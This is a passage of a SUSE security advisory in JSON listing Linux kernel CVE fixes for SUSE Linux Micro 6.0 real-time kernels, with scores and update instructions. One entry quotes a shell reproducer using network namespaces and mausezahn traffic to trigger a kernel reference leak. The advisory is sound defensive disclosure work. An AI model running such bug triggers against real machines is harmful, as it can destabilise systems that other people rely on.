"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68233"
},
{
"cve": "CVE-2025-68235",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68235"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnouveau/firmware: Add missing kfree() of nvkm_falcon_fw::boot\n\nnvkm_falcon_fw::boot is allocated, but no one frees it. This causes a\nkmemleak warning.\n\nMake sure this data is deallocated.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68235",
"url": "https://www.suse.com/security/cve/CVE-2025-68235"
},
{
"category": "external",
"summary": "SUSE Bug 1255209 for CVE-2025-68235",
"url": "https://bugzilla.suse.com/1255209"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68235"
},
{
"cve": "CVE-2025-68237",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68237"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtdchar: fix integer overflow in read/write ioctls\n\nThe \"req.start\" and \"req.len\" variables are u64 values that come from the\nuser at the start of the function. We mask away the high 32 bits of\n\"req.len\" so that\u0027s capped at U32_MAX but the \"req.start\" variable can go\nup to U64_MAX which means that the addition can still integer overflow.\n\nUse check_add_overflow() to fix this bug.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68237",
"url": "https://www.suse.com/security/cve/CVE-2025-68237"
},
{
"category": "external",
"summary": "SUSE Bug 1255203 for CVE-2025-68237",
"url": "https://bugzilla.suse.com/1255203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68237"
},
{
"cve": "CVE-2025-68238",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68238"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: rawnand: cadence: fix DMA device NULL pointer dereference\n\nThe DMA device pointer `dma_dev` was being dereferenced before ensuring\nthat `cdns_ctrl-\u003edmac` is properly initialized.\n\nMove the assignment of `dma_dev` after successfully acquiring the DMA\nchannel to ensure the pointer is valid before use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68238",
"url": "https://www.suse.com/security/cve/CVE-2025-68238"
},
{
"category": "external",
"summary": "SUSE Bug 1255202 for CVE-2025-68238",
"url": "https://bugzilla.suse.com/1255202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68238"
},
{
"cve": "CVE-2025-68239",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68239"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinfmt_misc: restore write access before closing files opened by open_exec()\n\nbm_register_write() opens an executable file using open_exec(), which\ninternally calls do_open_execat() and denies write access on the file to\navoid modification while it is being executed.\n\nHowever, when an error occurs, bm_register_write() closes the file using\nfilp_close() directly. This does not restore the write permission, which\nmay cause subsequent write operations on the same file to fail.\n\nFix this by calling exe_file_allow_write_access() before filp_close() to\nrestore the write permission properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68239",
"url": "https://www.suse.com/security/cve/CVE-2025-68239"
},
{
"category": "external",
"summary": "SUSE Bug 1255272 for CVE-2025-68239",
"url": "https://bugzilla.suse.com/1255272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68239"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68244",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68244"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915: Avoid lock inversion when pinning to GGTT on CHV/BXT+VTD\n\nOn completion of i915_vma_pin_ww(), a synchronous variant of\ndma_fence_work_commit() is called. When pinning a VMA to GGTT address\nspace on a Cherry View family processor, or on a Broxton generation SoC\nwith VTD enabled, i.e., when stop_machine() is then called from\nintel_ggtt_bind_vma(), that can potentially lead to lock inversion among\nreservation_ww and cpu_hotplug locks.\n\n[86.861179] ======================================================\n[86.861193] WARNING: possible circular locking dependency detected\n[86.861209] 6.15.0-rc5-CI_DRM_16515-gca0305cadc2d+ #1 Tainted: G U\n[86.861226] ------------------------------------------------------\n[86.861238] i915_module_loa/1432 is trying to acquire lock:\n[86.861252] ffffffff83489090 (cpu_hotplug_lock){++++}-{0:0}, at: stop_machine+0x1c/0x50\n[86.861290]\nbut task is already holding lock:\n[86.861303] ffffc90002e0b4c8 (reservation_ww_class_mutex){+.+.}-{3:3}, at: i915_vma_pin.constprop.0+0x39/0x1d0 [i915]\n[86.862233]\nwhich lock already depends on the new lock.\n[86.862251]\nthe existing dependency chain (in reverse order) is:\n[86.862265]\n-\u003e #5 (reservation_ww_class_mutex){+.+.}-{3:3}:\n[86.862292] dma_resv_lockdep+0x19a/0x390\n[86.862315] do_one_initcall+0x60/0x3f0\n[86.862334] kernel_init_freeable+0x3cd/0x680\n[86.862353] kernel_init+0x1b/0x200\n[86.862369] ret_from_fork+0x47/0x70\n[86.862383] ret_from_fork_asm+0x1a/0x30\n[86.862399]\n-\u003e #4 (reservation_ww_class_acquire){+.+.}-{0:0}:\n[86.862425] dma_resv_lockdep+0x178/0x390\n[86.862440] do_one_initcall+0x60/0x3f0\n[86.862454] kernel_init_freeable+0x3cd/0x680\n[86.862470] kernel_init+0x1b/0x200\n[86.862482] ret_from_fork+0x47/0x70\n[86.862495] ret_from_fork_asm+0x1a/0x30\n[86.862509]\n-\u003e #3 (\u0026mm-\u003emmap_lock){++++}-{3:3}:\n[86.862531] down_read_killable+0x46/0x1e0\n[86.862546] lock_mm_and_find_vma+0xa2/0x280\n[86.862561] do_user_addr_fault+0x266/0x8e0\n[86.862578] exc_page_fault+0x8a/0x2f0\n[86.862593] asm_exc_page_fault+0x27/0x30\n[86.862607] filldir64+0xeb/0x180\n[86.862620] kernfs_fop_readdir+0x118/0x480\n[86.862635] iterate_dir+0xcf/0x2b0\n[86.862648] __x64_sys_getdents64+0x84/0x140\n[86.862661] x64_sys_call+0x1058/0x2660\n[86.862675] do_syscall_64+0x91/0xe90\n[86.862689] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[86.862703]\n-\u003e #2 (\u0026root-\u003ekernfs_rwsem){++++}-{3:3}:\n[86.862725] down_write+0x3e/0xf0\n[86.862738] kernfs_add_one+0x30/0x3c0\n[86.862751] kernfs_create_dir_ns+0x53/0xb0\n[86.862765] internal_create_group+0x134/0x4c0\n[86.862779] sysfs_create_group+0x13/0x20\n[86.862792] topology_add_dev+0x1d/0x30\n[86.862806] cpuhp_invoke_callback+0x4b5/0x850\n[86.862822] cpuhp_issue_call+0xbf/0x1f0\n[86.862836] __cpuhp_setup_state_cpuslocked+0x111/0x320\n[86.862852] __cpuhp_setup_state+0xb0/0x220\n[86.862866] topology_sysfs_init+0x30/0x50\n[86.862879] do_one_initcall+0x60/0x3f0\n[86.862893] kernel_init_freeable+0x3cd/0x680\n[86.862908] kernel_init+0x1b/0x200\n[86.862921] ret_from_fork+0x47/0x70\n[86.862934] ret_from_fork_asm+0x1a/0x30\n[86.862947]\n-\u003e #1 (cpuhp_state_mutex){+.+.}-{3:3}:\n[86.862969] __mutex_lock+0xaa/0xed0\n[86.862982] mutex_lock_nested+0x1b/0x30\n[86.862995] __cpuhp_setup_state_cpuslocked+0x67/0x320\n[86.863012] __cpuhp_setup_state+0xb0/0x220\n[86.863026] page_alloc_init_cpuhp+0x2d/0x60\n[86.863041] mm_core_init+0x22/0x2d0\n[86.863054] start_kernel+0x576/0xbd0\n[86.863068] x86_64_start_reservations+0x18/0x30\n[86.863084] x86_64_start_kernel+0xbf/0x110\n[86.863098] common_startup_64+0x13e/0x141\n[86.863114]\n-\u003e #0 (cpu_hotplug_lock){++++}-{0:0}:\n[86.863135] __lock_acquire+0x16\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68244",
"url": "https://www.suse.com/security/cve/CVE-2025-68244"
},
{
"category": "external",
"summary": "SUSE Bug 1255190 for CVE-2025-68244",
"url": "https://bugzilla.suse.com/1255190"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68244"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n - No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68249",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68249"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: usb: hdm_probe: Fix calling put_device() before device initialization\n\nThe early error path in hdm_probe() can jump to err_free_mdev before\n\u0026mdev-\u003edev has been initialized with device_initialize(). Calling\nput_device(\u0026mdev-\u003edev) there triggers a device core WARN and ends up\ninvoking kref_put(\u0026kobj-\u003ekref, kobject_release) on an uninitialized\nkobject.\n\nIn this path the private struct was only kmalloc\u0027ed and the intended\nrelease is effectively kfree(mdev) anyway, so free it directly instead\nof calling put_device() on an uninitialized device.\n\nThis removes the WARNING and fixes the pre-initialization error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68249",
"url": "https://www.suse.com/security/cve/CVE-2025-68249"
},
{
"category": "external",
"summary": "SUSE Bug 1255233 for CVE-2025-68249",
"url": "https://bugzilla.suse.com/1255233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68249"
},
{
"cve": "CVE-2025-68252",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68252"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: fastrpc: Fix dma_buf object leak in fastrpc_map_lookup\n\nIn fastrpc_map_lookup, dma_buf_get is called to obtain a reference to\nthe dma_buf for comparison purposes. However, this reference is never\nreleased when the function returns, leading to a dma_buf memory leak.\n\nFix this by adding dma_buf_put before returning from the function,\nensuring that the temporarily acquired reference is properly released\nregardless of whether a matching map is found.\n\nRule: add",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68252",
"url": "https://www.suse.com/security/cve/CVE-2025-68252"
},
{
"category": "external",
"summary": "SUSE Bug 1255197 for CVE-2025-68252",
"url": "https://bugzilla.suse.com/1255197"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68252"
},
{
"cve": "CVE-2025-68254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix out-of-bounds read in OnBeacon ESR IE parsing\n\nThe Extended Supported Rates (ESR) IE handling in OnBeacon accessed\n*(p + 1 + ielen) and *(p + 2 + ielen) without verifying that these\noffsets lie within the received frame buffer. A malformed beacon with\nan ESR IE positioned at the end of the buffer could cause an\nout-of-bounds read, potentially triggering a kernel panic.\n\nAdd a boundary check to ensure that the ESR IE body and the subsequent\nbytes are within the limits of the frame before attempting to access\nthem.\n\nThis prevents OOB reads caused by malformed beacon frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
